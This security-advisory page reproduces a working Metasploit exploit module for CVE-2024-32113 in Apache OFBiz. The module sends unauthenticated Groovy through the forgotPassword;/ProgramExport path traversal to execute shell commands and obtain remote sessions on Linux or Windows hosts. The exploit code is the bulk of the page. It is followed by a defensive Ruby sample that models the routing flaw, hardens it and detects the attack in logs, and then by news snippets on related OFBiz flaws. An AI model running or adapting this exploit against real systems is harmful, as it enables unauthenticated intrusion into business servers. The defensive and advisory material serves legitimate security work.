Headline
Apache OFBiz Forgot Password Directory Traversal
Apache OFBiz versions prior to 18.12.13 contain a path traversal flaw (CVE-2024-32113). The endpoint /webtools/control/forgotPassword, which is reachable without credentials, can be steered to the ProgramExport endpoint by appending ';/ProgramExport' to the path. ProgramExport runs attacker-supplied Groovy, which gives remote code execution in the context of the user running the application.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache OFBiz Forgot Password Directory Traversal',
        'Description' => %q{
          Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability.
          The vulnerable endpoint /webtools/control/forgotPassword allows an attacker to access the
          ProgramExport endpoint which in turn allows for remote code execution in the context of
          the user running the application.
        },
        'Author' => [
          'Mr-xn', # PoC
          'jheysel-r7' # module
        ],
        'References' => [
          [ 'URL', 'https://github.com/Mr-xn/CVE-2024-32113'],
          [ 'URL', 'https://xz.aliyun.com/t/14733?time__1311=mqmx9Qwx0WDsd5YK0%3Dai%3Dmd7KbxGupD&alichlgref=https%3A%2F%2Fgithub.com%2FMr-xn%2FCVE-2024-32113'],
          [ 'CVE', '2024-32113']
        ],
        'License' => MSF_LICENSE,
        'Platform' => %w[linux win],
        'Privileged' => true, # You get a root session when exploiting a docker container, but a user-level session on Windows.
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Linux Command',
            {
              'Platform' => ['linux', 'unix'],
              'Arch' => [ARCH_CMD],
              'Type' => :unix_cmd
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => ['win'],
              'Arch' => [ARCH_CMD],
              'Type' => :win_cmd
            }
          ],
        ],
        'Payload' => {
          'BadChars' => "\x3a"
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2024-05-30',
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        },
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 8443
        }
      )
    )
  end

  # Posts a Groovy program to ProgramExport by way of the forgotPassword endpoint.
  # The ';/ProgramExport' suffix is the traversal: the request passes as forgotPassword
  # but is dispatched to ProgramExport. Throwing an exception whose message is the
  # command output makes that output appear in the error page, which check() parses.
  def send_cmd_injection(cmd)
    data = "groovyProgram=throw+new+Exception('#{cmd}'.execute().text);"
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/webtools/control/forgotPassword;/ProgramExport'),
      'headers' => { 'HOST' => '127.0.0.1' },
      'method' => 'POST',
      'data' => data
    })
  end

  def check
    echo_test_string = rand_text_alpha(8..12)
    case target['Type']
    when :win_cmd
      test_payload = to_unicode_escape("cmd.exe /c echo #{echo_test_string}")
    when :unix_cmd
      test_payload = to_unicode_escape("echo #{echo_test_string}")
    else
      return CheckCode::Unknown('Please select a valid target')
    end

    res = send_cmd_injection(test_payload)
    return CheckCode::Unknown('Target did not respond to check.') unless res

    # A vulnerable host echoes the random marker back inside the error message div.
    unless res.get_html_document&.xpath("//div[@class='content-messages errorMessage' and .//p[contains(text(), 'java.lang.Exception: #{echo_test_string}')]]")&.empty?
      return CheckCode::Vulnerable('Tested remote code execution successfully')
    end

    CheckCode::Safe('Attempting to exploit vulnerability failed.')
  end

  # Encodes every character as a Java/Groovy \uXXXX escape. The result contains only
  # backslashes, 'u' and hex digits, so it needs no URL encoding in the form body and
  # cannot break out of the single-quoted Groovy string; Groovy decodes it before parsing.
  def to_unicode_escape(str)
    str.chars.map { |char| '\\u%04x' % char.ord }.join
  end

  def exploit
    print_status('Attempting to exploit...')
    res = ''
    case target['Type']
    when :win_cmd
      res = send_cmd_injection(payload.encoded)
    when :unix_cmd
      res = send_cmd_injection(to_unicode_escape("sh -c $@|sh . echo #{payload.raw}"))
    else
      fail_with(Failure::BadConfig, 'Invalid target specified')
    end
    # A successful payload blocks the request, so any HTTP response means it did not run.
    print_error('The target responded to the exploit attempt which is not expected. The exploit likely failed') if res
  end
end
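The Ruby below is an added example; it is not part of the Metasploit module above or of Apache OFBiz. It models the class of routing disagreement the module abuses (an authorisation check that keys on the first path segment while dispatch honours the segment after ';/'), puts a hardened resolver beside it that derives the view once and rejects surviving delimiters, and flags the traversal signature in constructed access-log lines. The view list, function names and routing rules are simplifying assumptions for illustration; OFBiz's real request handler is not reproduced here.

```ruby
# Added example: models the class of routing bug behind CVE-2024-32113 and a log
# check for its signature. Not code from the Metasploit module or from Apache OFBiz;
# the view list, function names and routing rules are simplifying assumptions.
require 'uri'

# Views a hypothetical application exposes to anonymous users (assumption).
PUBLIC_VIEWS = %w[main login forgotPassword].freeze

# Everything after the control servlet mount point, with the query string dropped.
def view_path(path)
  path.split('/control/', 2)[1].to_s.split('?', 2).first.to_s
end

# Vulnerable pattern, step 1: the authorisation check keys on the first path
# segment and ignores matrix parameters (anything from ';' onwards).
def vulnerable_authz_view(path)
  view_path(path).split('/', 2).first.to_s.split(';', 2).first.to_s
end

# Vulnerable pattern, step 2: dispatch resolves the *last* '/'-separated segment,
# so "forgotPassword;/ProgramExport" is authorised as forgotPassword but executed
# as ProgramExport.
def vulnerable_dispatch_view(path)
  last = view_path(path).split('/').reject(&:empty?).last.to_s
  last.split(';', 2).first.to_s
end

def vulnerable_route(path, authenticated:)
  return :denied unless authenticated || PUBLIC_VIEWS.include?(vulnerable_authz_view(path))
  vulnerable_dispatch_view(path)
end

# Hardened: decode once, derive a single canonical view name, and refuse any
# request in which a delimiter survives canonicalisation. Authorisation and
# dispatch then necessarily agree on what was requested.
def hardened_route(path, authenticated:)
  view = URI.decode_www_form_component(view_path(path))
  return :rejected if view.empty? || view.include?('..') || view.match?(%r{[/;\\]})
  return :denied unless authenticated || PUBLIC_VIEWS.include?(view)
  view
end

# Detection side: a control-servlet path carrying a ';' followed by a further
# '/segment' is the traversal signature. A bare matrix parameter such as
# ';jsessionid=...' is normal servlet behaviour and is not flagged.
TRAVERSAL_RE = %r{/control/[^\s;?]*;[^\s?]*/[A-Za-z]}

def suspicious_request?(log_line)
  m = log_line.match(/"(?:GET|POST|PUT|HEAD)\s+(\S+)/)
  return false unless m
  # Decode so a percent-encoded ';' (%3B) is caught as well.
  TRAVERSAL_RE.match?(URI.decode_www_form_component(m[1]))
end

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = [
  '10.0.0.5 - - [30/May/2024:10:00:01 +0000] "POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1" 200 5120',
  '10.0.0.6 - - [30/May/2024:10:00:02 +0000] "GET /webtools/control/forgotPassword HTTP/1.1" 200 2210',
  '10.0.0.7 - - [30/May/2024:10:00:03 +0000] "GET /webtools/control/main;jsessionid=ABC123 HTTP/1.1" 200 1800',
  '10.0.0.8 - - [30/May/2024:10:00:04 +0000] "POST /webtools/control/forgotPassword%3B/ProgramExport HTTP/1.1" 200 5120'
].freeze

def flagged_lines(lines = SAMPLE_LOG)
  lines.select { |line| suspicious_request?(line) }
end

if __FILE__ == $PROGRAM_NAME
  attack = '/webtools/control/forgotPassword;/ProgramExport'
  puts "vulnerable router, unauthenticated: #{vulnerable_route(attack, authenticated: false).inspect}"
  puts "hardened router, unauthenticated:   #{hardened_route(attack, authenticated: false).inspect}"
  flagged_lines.each { |line| puts "FLAGGED: #{line}" }
end
```

Run stand-alone it prints "ProgramExport" for the vulnerable router and :rejected for the hardened one, and flags the two traversal lines (plain and %3B-encoded) while leaving the jsessionid request alone. The hardened resolver rejects rather than normalises because a request that still contains a delimiter after decoding has no single honest interpretation.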
Related news
A new security flaw has been addressed in the Apache OFBiz open-source enterprise resource planning (ERP) system that, if successfully exploited, could lead to unauthenticated remote code execution on Linux and Windows. The high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affects all versions of the software before 18.12.16. "An attacker with no valid
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw affecting the Apache OFBiz open-source enterprise resource planning (ERP) system to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The vulnerability, known as CVE-2024-38856, carries a CVSS score of 9.8, indicating critical severity.
A new zero-day pre-authentication remote code execution vulnerability has been disclosed in the Apache OFBiz open-source enterprise resource planning (ERP) system that could allow threat actors to achieve remote code execution on affected instances. Tracked as CVE-2024-38856, the flaw has a CVSS score of 9.8 out of a maximum of 10.0. It affects Apache OFBiz versions prior to 18.12.15. "The